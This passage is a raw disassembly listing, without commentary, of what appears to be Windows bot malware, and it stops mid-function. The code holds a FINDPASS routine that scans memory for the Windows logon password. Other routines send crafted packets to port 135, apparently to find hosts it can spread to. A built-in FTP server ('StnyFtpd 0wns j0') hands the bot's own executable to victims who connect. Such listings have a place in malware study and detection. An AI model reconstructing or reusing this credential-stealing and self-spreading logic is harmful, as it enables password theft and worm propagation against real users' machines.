xor eax, eax
jmp loc_406185
; ---------------------------------------------------------------------------
loc_40600A: ; CODE XREF: sub_405FE1+20�j
mov eax, [ebp+arg_4]
push ebx
push edi
mov [eax], esi
lea eax, [ebp+var_64]
push eax
call ds:dword_49436C
push [ebp+var_60]
mov [ebp+var_8], esi
mov esi, ds:dword_494358
push 8
call esi
mov edi, ds:dword_494354
push eax
call edi
lea ecx, [ebp+var_8]
mov ebx, ds:dword_494368
push ecx
mov [ebp+arg_0], eax
push [ebp+var_60]
push eax
push 7FFDF000h
push [ebp+var_4]
call ebx
test eax, eax
jnz short loc_40605A
xor esi, esi
jmp loc_406178
; ---------------------------------------------------------------------------
loc_40605A: ; CODE XREF: sub_405FE1+70�j
lea eax, [ebp+var_40]
push 1Ch
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+18h]
push [ebp+var_4]
call ds:dword_494364
test eax, eax
jz loc_406167
mov ecx, [ebp+var_30]
mov eax, 1000h
and ecx, eax
cmp ecx, eax
jnz loc_406167
test [ebp+var_2B], 1
jnz loc_406167
push [ebp+var_34]
push 8
call esi
push eax
call edi
mov edi, eax
lea eax, [ebp+var_8]
push eax
mov eax, [ebp+arg_0]
push [ebp+var_34]
mov [ebp+var_C], edi
push edi
push dword ptr [eax+18h]
push [ebp+var_4]
call ebx
test eax, eax
jz loc_406167
loc_4060BD: ; CODE XREF: sub_405FE1+112�j
push edi
push offset dword_449F28
call sub_431000
pop ecx
test eax, eax
pop ecx
jnz short loc_4060E5
lea eax, [edi+200h]
push eax
push offset dword_44A728
call sub_431000
pop ecx
test eax, eax
pop ecx
jz short loc_4060F5
loc_4060E5: ; CODE XREF: sub_405FE1+EB�j
mov eax, [ebp+var_34]
mov ecx, [ebp+var_C]
inc edi
add eax, ecx
inc edi
cmp edi, eax
jnb short loc_406167
jmp short loc_4060BD
; ---------------------------------------------------------------------------
loc_4060F5: ; CODE XREF: sub_405FE1+102�j
test edi, edi
jz short loc_406167
lea eax, [ebp+var_14]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_494360
test eax, eax
jz short loc_406130
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_14]
push eax
call ds:dword_49435C
test eax, eax
jz short loc_406130
mov al, [edi+42Ch]
mov ecx, [ebp+arg_4]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_406130: ; CODE XREF: sub_405FE1+12B�j
; sub_405FE1+13D�j
movzx eax, word ptr [edi+42Ch]
shr eax, 8
mov dword_44B14C, eax
mov eax, [ebp+arg_0]
mov [ebp+var_10], 1
mov eax, [eax+18h]
sub eax, [ebp+var_C]
lea eax, [eax+edi+434h]
add edi, 434h
mov dword_44B144, eax
mov dword_44B148, edi
loc_406167: ; CODE XREF: sub_405FE1+90�j
; sub_405FE1+A2�j ...
push [ebp+arg_0]
push 0
call esi
push eax
call ds:dword_494350
mov esi, [ebp+var_10]
loc_406178: ; CODE XREF: sub_405FE1+74�j
push [ebp+var_4]
call ds:dword_4942E0
pop edi
mov eax, esi
pop ebx
loc_406185: ; CODE XREF: sub_405FE1+24�j
pop esi
leave
retn
sub_405FE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406188 proc near ; CODE XREF: sub_405C86:loc_405D7E�p
var_4C = byte ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_28 = byte ptr -28h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push [ebp+arg_0]
push 0
push 410h
call ds:dword_494370
test eax, eax
mov [ebp+arg_0], eax
jz loc_40627A
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
lea eax, [ebp+var_4C]
push eax
call ds:dword_49436C
mov ebx, [ebp+var_44]
mov eax, [ebp+var_40]
cmp ebx, eax
mov [ebp+var_C], eax
jnb loc_406271
mov edi, ds:dword_494358
loc_4061D3: ; CODE XREF: sub_406188+E3�j
lea eax, [ebp+var_28]
push 1Ch
push eax
push ebx
push [ebp+arg_0]
call ds:dword_494364
test eax, eax
jz short loc_40625F
mov edx, [ebp+var_18]
mov ecx, [ebp+var_1C]
mov eax, 1000h
mov [ebp+var_4], ecx
and edx, eax
cmp edx, eax
jnz short loc_406265
test [ebp+var_13], 1
jnz short loc_406265
push ecx
push 8
call edi
push eax
call ds:dword_494354
mov esi, eax
lea eax, [ebp+var_8]
push eax
and [ebp+var_8], 0
push [ebp+var_1C]
push esi
push ebx
push [ebp+arg_0]
call ds:dword_494368
test eax, eax
jz short loc_406251
push offset dword_449F28
push esi
call sub_431000
pop ecx
test eax, eax
pop ecx
jnz short loc_406251
lea eax, [esi+400h]
push offset dword_44A728
push eax
call sub_431000
pop ecx
test eax, eax
pop ecx
jz short loc_406281
loc_406251: ; CODE XREF: sub_406188+9F�j
; sub_406188+B0�j
push esi
push 0
call edi
push eax
call ds:dword_494350
jmp short loc_406265
; ---------------------------------------------------------------------------
loc_40625F: ; CODE XREF: sub_406188+5D�j
mov eax, [ebp+var_48]
mov [ebp+var_4], eax
loc_406265: ; CODE XREF: sub_406188+71�j
; sub_406188+77�j ...
add ebx, [ebp+var_4]
cmp ebx, [ebp+var_C]
jb loc_4061D3
loc_406271: ; CODE XREF: sub_406188+3F�j
push [ebp+arg_0]
call ds:dword_4942E0
loc_40627A: ; CODE XREF: sub_406188+1E�j
xor eax, eax
loc_40627C: ; CODE XREF: sub_406188+134�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_406281: ; CODE XREF: sub_406188+C7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov dword_44B144, ebx
mov dword_44B148, eax
cmp [eax], cl
jnz short loc_4062A3
cmp [eax+1], cl
jz short loc_4062AB
loc_4062A3: ; CODE XREF: sub_406188+114�j
; sub_406188+121�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_4062A3
loc_4062AB: ; CODE XREF: sub_406188+119�j
mov eax, [ebp+arg_4]
push [ebp+arg_0]
mov [eax], ecx
call ds:dword_4942E0
push 1
pop eax
jmp short loc_40627C
sub_406188 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062BE proc near ; CODE XREF: sub_405C86+135�p
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_44B140
push esi
mov esi, ds:dword_494358
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_6], ax
mov [ebp+var_8], cx
movzx eax, ax
push eax
push 8
call esi
push eax
call ds:dword_494354
mov ecx, dword_44B140
mov [ebp+var_4], eax
add ecx, ecx
push ecx
push dword_44B148
push eax
call sub_418A00
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
mov al, byte ptr dword_44B14C
push eax
call dword_44AF2C
push [ebp+var_4]
mov edi, offset dword_44AF38
push offset dword_449F28
push offset dword_44A728
push [ebp+arg_0]
push offset aFindpassTheW_0 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push 200h
push edi
call sub_418EF0
add esp, 1Ch
push [ebp+var_4]
push 0
call esi
push eax
call ds:dword_494350
mov eax, edi
pop edi
pop esi
leave
retn
sub_4062BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406355 proc near ; CODE XREF: sub_405C86:loc_405DC2�p
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_44B140
push ebx
push esi
push edi
lea ecx, [eax+eax]
lea eax, [eax+eax+2]
mov [ebp+var_16], ax
mov [ebp+var_18], cx
movzx eax, ax
push eax
push 8
call ds:dword_494358
push eax
call ds:dword_494354
and [ebp+var_C], 0
mov [ebp+var_14], eax
mov ebx, offset dword_44A728
mov edi, 200h
mov esi, offset dword_449D28
loc_40639B: ; CODE XREF: sub_406355+FA�j
mov eax, dword_44B140
add eax, eax
push eax
push dword_44B148
push [ebp+var_14]
call sub_418A00
add esp, 0Ch
lea eax, [ebp+var_18]
push eax
push [ebp+var_C]
call dword_44AF2C
mov eax, dword_44B140
and [ebp+var_10], 0
mov ecx, [ebp+var_14]
mov [ebp+var_8], 1
test eax, eax
jbe short loc_406410
loc_4063D8: ; CODE XREF: sub_406355+B3�j
cmp [ebp+var_8], 0
jz short loc_40642D
mov dl, [ecx]
test dl, dl
mov [ebp+var_1], dl
jz short loc_4063FC
cmp byte ptr [ecx+1], 0
jnz short loc_4063FC
cmp dl, 20h
jnb short loc_4063F6
and [ebp+var_8], 0
loc_4063F6: ; CODE XREF: sub_406355+9B�j
cmp [ebp+var_1], 7Eh
jbe short loc_406400
loc_4063FC: ; CODE XREF: sub_406355+90�j
; sub_406355+96�j
and [ebp+var_8], 0
loc_406400: ; CODE XREF: sub_406355+A5�j
inc ecx
inc ecx
inc [ebp+var_10]
cmp [ebp+var_10], eax
jb short loc_4063D8
cmp [ebp+var_8], 0
jz short loc_40642D
loc_406410: ; CODE XREF: sub_406355+81�j
push [ebp+var_14]
push offset dword_449F28
push ebx
push [ebp+arg_0]
push offset aFindpassTheW_1 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push edi
push esi
call sub_418EF0
add esp, 1Ch
jmp short loc_406445
; ---------------------------------------------------------------------------
loc_40642D: ; CODE XREF: sub_406355+87�j
; sub_406355+B9�j
push offset dword_449F28
push ebx
push [ebp+arg_0]
push offset aFindpassTheW_2 ; "[FINDPASS]: The Windows logon (Pid: <%d"...
push edi
push esi
call sub_418EF0
add esp, 18h
loc_406445: ; CODE XREF: sub_406355+D6�j
inc [ebp+var_C]
cmp [ebp+var_C], 0FFh
jbe loc_40639B
push [ebp+var_14]
push 0
call ds:dword_494358
push eax
call ds:dword_494350
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_406355 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40646E proc near ; CODE XREF: sub_4064A6+125�p
; sub_4064A6+14C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
xor esi, esi
sub edi, [ebp+arg_C]
test edi, edi
jle short loc_40649C
loc_40647F: ; CODE XREF: sub_40646E+2C�j
push [ebp+arg_C]
mov eax, [ebp+arg_0]
add eax, esi
push [ebp+arg_8]
push eax
call sub_41A7A0
add esp, 0Ch
test eax, eax
jz short loc_4064A2
inc esi
cmp esi, edi
jl short loc_40647F
loc_40649C: ; CODE XREF: sub_40646E+F�j
xor al, al
loc_40649E: ; CODE XREF: sub_40646E+36�j
pop edi
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4064A2: ; CODE XREF: sub_40646E+27�j
mov al, 1
jmp short loc_40649E
sub_40646E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4064A6 proc near ; CODE XREF: sub_4013F1+8B�p
; sub_4013F1+174�p ...
var_2010 = byte ptr -2010h
var_200E = byte ptr -200Eh
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call sub_418D40
mov eax, [ebp+arg_4]
push esi
dec eax
push edi
jz short loc_4064E7
dec eax
jz short loc_4064C5
dec eax
loc_4064BF: ; CODE XREF: sub_4064A6+57�j
xor eax, eax
loc_4064C1: ; CODE XREF: sub_4064A6+3F�j
; sub_4064A6+169�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4064C5: ; CODE XREF: sub_4064A6+16�j
push 3
push 1388h
push [ebp+arg_0]
call dword_44B700 ; inet_addr
push eax
call sub_402E0C
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_4064C1
; ---------------------------------------------------------------------------
loc_4064E7: ; CODE XREF: sub_4064A6+13�j
push 6
push 1
push 2
call dword_44B740 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_4064BF
push ebx
xor ebx, ebx
push 10h
lea eax, [ebp+var_10]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_10], 2
push 87h
call dword_44B6C0 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_40AED0
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_44B668 ; connect
cmp eax, edi
jz loc_406603
push ebx
push 48h
push offset dword_438570
push esi
call dword_44B710 ; send
cmp eax, edi
jz loc_406603
mov esi, 2000h
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_44B6D8 ; recv
cmp eax, edi
jz loc_406603
cmp [ebp+var_200E], 0Ch
jnz short loc_406603
push ebx
push 18h
push offset dword_4385BC
push [ebp+arg_4]
call dword_44B710 ; send
cmp eax, edi
jz short loc_406603
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_44B6D8 ; recv
mov esi, eax
cmp esi, edi
jz short loc_406603
cmp [ebp+var_200E], 2
jnz short loc_406603
push 10h
push offset dword_4385D8
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40646E
add esp, 10h
test al, al
jz short loc_4065E3
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_406603
; ---------------------------------------------------------------------------
loc_4065E3: ; CODE XREF: sub_4064A6+12F�j
push 10h
push offset dword_4385EC
lea eax, [ebp+var_2010]
push esi
push eax
call sub_40646E
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_406603: ; CODE XREF: sub_4064A6+9B�j
; sub_4064A6+B2�j ...
push [ebp+arg_4]
call dword_44B758 ; closesocket
mov eax, ebx
pop ebx
jmp loc_4064C1
sub_4064A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406614 proc near ; DATA XREF: sub_402994+226�o
var_A6C = byte ptr -0A6Ch
var_8DC = byte ptr -8DCh
var_6DC = dword ptr -6DCh
var_6D8 = byte ptr -6D8h
var_4C4 = byte ptr -4C4h
var_444 = dword ptr -444h
var_440 = dword ptr -440h
var_438 = dword ptr -438h
var_334 = byte ptr -334h
var_2D0 = byte ptr -2D0h
var_29C = byte ptr -29Ch
var_238 = byte ptr -238h
var_228 = dword ptr -228h
var_224 = dword ptr -224h
var_124 = byte ptr -124h
var_F8 = byte ptr -0F8h
var_C4 = byte ptr -0C4h
var_AC = byte ptr -0ACh
var_48 = byte ptr -48h
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = dword ptr -34h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A6Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6DC]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A6C]
xor edi, edi
push eax
push 101h
mov [ebp+var_28], ebx
mov [ebp+var_18], ebx
mov [ebp+var_228], edi
mov [ebp+var_438], edi
call ds:dword_4944AC ; WSAStartup
push edi
call sub_41ABD0
push eax
call sub_418FF0
pop ecx
pop ecx
call sub_419000
cdq
mov ecx, 0FC17h
push edi
idiv ecx
push ebx
push 2
add edx, 3E8h
mov dword_44B154, edx
call ds:dword_4944B0 ; socket
mov esi, eax
lea eax, [ebp+var_28]
push 4
push eax
push 4
push 0FFFFh
push esi
mov [ebp+var_C], esi
call ds:dword_4944B4 ; setsockopt
lea eax, [ebp+var_18]
push eax
push 8004667Eh
push esi
call ds:dword_4944B8 ; ioctlsocket
mov ax, word ptr dword_44B154
mov [ebp+var_38], 2
push eax
mov [ebp+var_34], edi
call ds:dword_4944BC ; htons
mov [ebp+var_36], ax
lea eax, [ebp+var_38]
push 10h
push eax
push esi
call ds:dword_4944C0 ; bind
test eax, eax
jge short loc_4066ED
mov eax, ebx
jmp loc_406C16
; ---------------------------------------------------------------------------
loc_4066ED: ; CODE XREF: sub_406614+D0�j
push 0Ah
push esi
call ds:dword_4944C4 ; listen
mov [ebp+var_228], ebx
mov ebx, ds:dword_4944C8
mov [ebp+var_224], esi
mov [ebp+var_4], esi
loc_40670B: ; CODE XREF: sub_406614+12E�j
; sub_406614+5FA�j
push 41h
lea esi, [ebp+var_228]
pop ecx
lea edi, [ebp+var_438]
rep movsd
xor edi, edi
lea eax, [ebp+var_438]
push edi
push edi
push edi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call ds:dword_4944CC ; select
cmp eax, 0FFFFFFFFh
jz loc_406C13
cmp [ebp+var_4], edi
mov [ebp+arg_0], edi
jl short loc_40670B
loc_406744: ; CODE XREF: sub_406614+5F4�j
xor esi, esi
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_4189A0
push 64h
lea eax, [ebp+var_AC]
push esi
push eax
call sub_4189A0
add esp, 18h
lea eax, [ebp+var_438]
push eax
push edi
call sub_430C92 ; __WSAFDIsSet
test eax, eax
jz loc_406C01
cmp edi, [ebp+var_C]
jnz loc_406807
lea eax, [ebp+var_24]
mov [ebp+var_24], 10h
push eax
lea eax, [ebp+var_238]
push eax
push [ebp+var_C]
call ds:dword_4944D4 ; accept
cmp eax, 0FFFFFFFFh
jz loc_406C01
xor ecx, ecx
cmp [ebp+var_228], esi
jbe short loc_4067D1
lea edx, [ebp+var_224]
jmp short loc_4067BE
; ---------------------------------------------------------------------------
loc_4067BB: ; CODE XREF: sub_406614+1BB�j
mov edx, [ebp+arg_0]
loc_4067BE: ; CODE XREF: sub_406614+1A5�j
cmp [edx], eax
jz short loc_4067D1
inc ecx
add edx, 4
cmp ecx, [ebp+var_228]
mov [ebp+arg_0], edx
jb short loc_4067BB
loc_4067D1: ; CODE XREF: sub_406614+19D�j
; sub_406614+1AC�j
cmp ecx, [ebp+var_228]
jnz short loc_4067EF
cmp [ebp+var_228], 40h
jnb short loc_4067EF
mov [ebp+ecx*4+var_224], eax
inc [ebp+var_228]
loc_4067EF: ; CODE XREF: sub_406614+1C3�j
; sub_406614+1CC�j
cmp eax, [ebp+var_4]
jle short loc_4067F7
mov [ebp+var_4], eax
loc_4067F7: ; CODE XREF: sub_406614+1DE�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_406C01
; ---------------------------------------------------------------------------
loc_406807: ; CODE XREF: sub_406614+16B�j
push esi
lea eax, [ebp+var_29C]
push 64h
push eax
push edi
call ds:dword_4944D8 ; recv
test eax, eax
jg short loc_40686E
mov edx, [ebp+var_228]
xor ecx, ecx
cmp edx, esi
jbe short loc_406862
lea eax, [ebp+var_224]
loc_40682E: ; CODE XREF: sub_406614+224�j
cmp [eax], edi
jz short loc_40683C
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_40682E
jmp short loc_406862
; ---------------------------------------------------------------------------
loc_40683C: ; CODE XREF: sub_406614+21C�j
dec edx
cmp ecx, edx
jnb short loc_40685C
lea eax, [ebp+ecx*4+var_224]
loc_406848: ; CODE XREF: sub_406614+246�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_228]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_406848
loc_40685C: ; CODE XREF: sub_406614+22B�j
dec [ebp+var_228]
loc_406862: ; CODE XREF: sub_406614+212�j
; sub_406614+226�j
push edi
call ds:dword_4944DC ; closesocket
jmp loc_406C01
; ---------------------------------------------------------------------------
loc_40686E: ; CODE XREF: sub_406614+206�j
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_AC]
push eax
lea eax, [ebp+var_29C]
push offset aSS_3 ; "%s %s"
push eax
call sub_4192A0
lea eax, [ebp+var_AC]
push offset aUser ; "USER"
push eax
call sub_419360
add esp, 18h
test eax, eax
jnz short loc_4068B2
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_406BEC
; ---------------------------------------------------------------------------
loc_4068B2: ; CODE XREF: sub_406614+28F�j
lea eax, [ebp+var_AC]
push offset aPass ; "PASS"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_4068D6
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp loc_406BEC
; ---------------------------------------------------------------------------
loc_4068D6: ; CODE XREF: sub_406614+2B3�j
lea eax, [ebp+var_AC]
push offset aSyst ; "SYST"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_4068FA
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp loc_406BEC
; ---------------------------------------------------------------------------
loc_4068FA: ; CODE XREF: sub_406614+2D7�j
lea eax, [ebp+var_AC]
push offset aRest ; "REST"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40691E
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp loc_406BEC
; ---------------------------------------------------------------------------
loc_40691E: ; CODE XREF: sub_406614+2FB�j
lea eax, [ebp+var_AC]
push offset off_438694
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_406942
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
jmp loc_406BEC
; ---------------------------------------------------------------------------
loc_406942: ; CODE XREF: sub_406614+31F�j
lea eax, [ebp+var_AC]
push offset aType ; "TYPE"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40697D
lea eax, [ebp+var_334]
push offset aA_0 ; "A"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_40697D
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_406BEC
; ---------------------------------------------------------------------------
loc_40697D: ; CODE XREF: sub_406614+343�j
; sub_406614+35A�j
lea eax, [ebp+var_AC]
push offset aType_0 ; "TYPE"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_4069B8
lea eax, [ebp+var_334]
push offset aI ; "I"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_4069B8
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_406BEC
; ---------------------------------------------------------------------------
loc_4069B8: ; CODE XREF: sub_406614+37E�j
; sub_406614+395�j
lea eax, [ebp+var_AC]
push offset aPasv ; "PASV"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_406A06
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+var_124]
rep movsd
push eax
lea eax, [ebp+var_124]
push eax
movsw
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_124]
loc_4069F6: ; CODE XREF: sub_406614+431�j
push eax
push [ebp+arg_0]
call ebx ; send
mov edi, [ebp+arg_0]
xor esi, esi
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_406A06: ; CODE XREF: sub_406614+3B9�j
lea eax, [ebp+var_AC]
push offset aList ; "LIST"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_406A47
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C4]
rep movsd
movsw
push eax
lea eax, [ebp+var_C4]
push eax
movsb
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_C4]
jmp short loc_4069F6
; ---------------------------------------------------------------------------
loc_406A47: ; CODE XREF: sub_406614+407�j
lea eax, [ebp+var_AC]
push offset aPort ; "PORT"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_406B18
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_29C]
push offset aS_2 ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_4192A0
lea eax, [ebp+var_F8]
push eax
call sub_4195F0
mov [ebp+var_8], eax
lea eax, [ebp+var_2D0]
push eax
call sub_4195F0
mov [ebp+arg_0], eax
push 32h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_4189A0
push [ebp+arg_0]
lea eax, [ebp+var_F8]
push [ebp+var_8]
push offset aXX ; "%x%x\n"
push eax
call sub_418D70
add esp, 44h
lea eax, [ebp+var_F8]
push 10h
push esi
push eax
call sub_41ABB0
mov [ebp+var_8], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_48]
push offset aS_S_S_S ; "%s.%s.%s.%s"
push eax
call sub_418D70
add esp, 24h
push esi
push 1Dh
push offset a200PortCommand ; "200 PORT command successful.\n"
jmp loc_406BEC
; ---------------------------------------------------------------------------
loc_406B18: ; CODE XREF: sub_406614+448�j
lea eax, [ebp+var_AC]
push offset aRetr ; "RETR"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz loc_406BCD
push esi
push 28h
push offset a150OpeningBina ; "150 Opening BINARY mode data connection"...
push edi
call ebx ; send
push [ebp+var_8]
lea eax, [ebp+var_48]
push eax
call sub_406C1D
pop ecx
cmp eax, 1
pop ecx
jnz short loc_406BC3
call sub_406C9A
cmp eax, 1
jnz loc_406BEF
push esi
push 17h
push offset a226TransferC_0 ; "226 Transfer complete.\n"
push edi
call ebx ; send
lea eax, [ebp+var_6D8]
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_8DC]
push offset aFtpFileTransfe ; "[FTP]: File transfer complete to IP: %s"...
push eax
call sub_418D70
add esp, 10h
cmp [ebp+var_440], esi
jnz short loc_406BB4
push esi
lea eax, [ebp+var_8DC]
push [ebp+var_444]
push eax
lea eax, [ebp+var_4C4]
push eax
push [ebp+var_6DC]
call sub_40842D
add esp, 14h
loc_406BB4: ; CODE XREF: sub_406614+57B�j
lea eax, [ebp+var_8DC]
push eax
call sub_4035E1
pop ecx
jmp short loc_406BEF
; ---------------------------------------------------------------------------
loc_406BC3: ; CODE XREF: sub_406614+53B�j
push esi
push 20h
push offset a425CanTOpenDat ; "425 Can't open data connection.\n"
jmp short loc_406BEC
; ---------------------------------------------------------------------------
loc_406BCD: ; CODE XREF: sub_406614+519�j
lea eax, [ebp+var_AC]
push offset aQuit ; "QUIT"
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_406BEF
push esi
push 1Bh
push offset a221GoodbyeHapp ; "221 Goodbye happy r00ting.\n"
loc_406BEC: ; CODE XREF: sub_406614+299�j
; sub_406614+2BD�j ...
push edi
call ebx ; send
loc_406BEF: ; CODE XREF: sub_406614+3ED�j
; sub_406614+545�j ...
push 64h
lea eax, [ebp+var_29C]
push esi
push eax
call sub_4189A0
add esp, 0Ch
loc_406C01: ; CODE XREF: sub_406614+162�j
; sub_406614+18F�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_406744
jmp loc_40670B
; ---------------------------------------------------------------------------
loc_406C13: ; CODE XREF: sub_406614+122�j
push 1
pop eax
loc_406C16: ; CODE XREF: sub_406614+D4�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_406614 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C1D proc near ; CODE XREF: sub_406614+531�p
var_1A0 = byte ptr -1A0h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+var_1A0]
push eax
push 101h
call ds:dword_4944AC ; WSAStartup
push 0
push 1
push 2
call ds:dword_4944B0 ; socket
push [ebp+arg_0]
mov dword_44B150, eax
mov [ebp+var_10], 2
call ds:dword_4944A0 ; inet_addr
push [ebp+arg_4]
mov [ebp+var_C], eax
call ds:dword_4944BC ; htons
mov [ebp+var_E], ax
lea eax, [ebp+var_10]
push 10h
push eax
push dword_44B150
call ds:dword_4944A4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_406C95
push dword_44B150
call ds:dword_4944DC ; closesocket
call ds:dword_4944A8 ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_406C95: ; CODE XREF: sub_406C1D+60�j
push 1
pop eax
leave
retn
sub_406C1D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C9A proc near ; CODE XREF: sub_406614+53D�p
var_504 = byte ptr -504h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 504h
push esi
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call ds:dword_4942F8
lea eax, [ebp+var_104]
push offset aRb_0 ; "rb"
push eax
call sub_419D70
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_406D31
test byte ptr [esi+0Ch], 10h
jnz short loc_406D15
push edi
mov edi, 400h
